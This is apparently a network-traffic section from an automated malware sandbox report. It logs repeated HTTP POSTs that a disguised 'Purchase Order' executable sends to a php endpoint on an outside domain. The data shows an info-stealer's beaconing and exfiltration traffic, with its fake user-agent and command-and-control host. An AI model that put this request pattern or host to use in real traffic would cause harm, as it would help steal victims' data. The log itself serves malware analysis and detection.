                    Jan 14, 2022 07:15:16.029309988 CET1246INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.449775104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:30.454418898 CET1345OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:30.710796118 CET1345INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.449776104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:31.824330091 CET1346OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:32.075763941 CET1347INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:30 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.449777104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:33.100122929 CET1348OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:33.355024099 CET1348INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.449778104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:35.394366026 CET1350OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:35.667382956 CET1372INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.449781104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:37.781119108 CET1373OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:38.033628941 CET1374INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:36 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.449782104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:40.339952946 CET1375OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:40.607796907 CET1375INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.449783104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:43.210043907 CET1376OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:43.464898109 CET1376INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.449784104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:44.685173988 CET1377OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:44.943876982 CET1378INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:43 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.449785104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:46.279601097 CET1379OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:46.535479069 CET1379INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.449786104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:48.680702925 CET1380OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:48.940790892 CET1381INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:47 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.449767104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:17.010469913 CET1247OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:17.266379118 CET1247INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.449787104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:51.278645992 CET1381OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:51.711889029 CET1382INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.449788104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:52.910922050 CET1383OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:53.164037943 CET1383INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.449789104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:54.384953022 CET1384OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:54.642054081 CET1385INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:53 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.449790104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:56.404035091 CET1386OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:56.687561035 CET1387INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:55 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.449791104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:58.873327017 CET1388OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:59.129765034 CET1388INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:58 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.449792104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:01.632257938 CET1389OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:02.004981041 CET1389INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.449793104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:03.275393009 CET1390OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:03.527699947 CET1391INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:02 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.449794104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:04.521631956 CET1392OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:04.775456905 CET1392INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.449795104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:05.921415091 CET1393OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:06.174947023 CET1394INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.449797104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:07.332344055 CET1473OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:07.593718052 CET1521INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:06 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.449768104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:18.393620968 CET1248OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:18.650015116 CET1249INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:17 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.449804104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:08.825263977 CET1624OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:09.082606077 CET1639INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.449823104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:12.085515976 CET2197OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:12.347671986 CET2200INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.449833104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:14.147581100 CET2219OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:14.442856073 CET2220INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.449834104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:17.416397095 CET2221OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:17.672099113 CET2221INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.449835104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:20.386728048 CET2222OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:20.641201019 CET2224INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:19 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.449841104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:24.539316893 CET10035OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:24.792671919 CET10036INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.449842104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:28.261720896 CET10037OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:28.518954039 CET10037INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:27 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.449843104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:30.749545097 CET10038OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:31.008444071 CET10039INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.449845104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:33.019782066 CET10841OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:33.277029037 CET10841INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.449846104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:34.831557989 CET10842OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:35.088538885 CET10843INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:33 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.449769104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:19.695573092 CET1250OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:20.016736984 CET1250INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:18 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.449852104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:36.784149885 CET10855OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
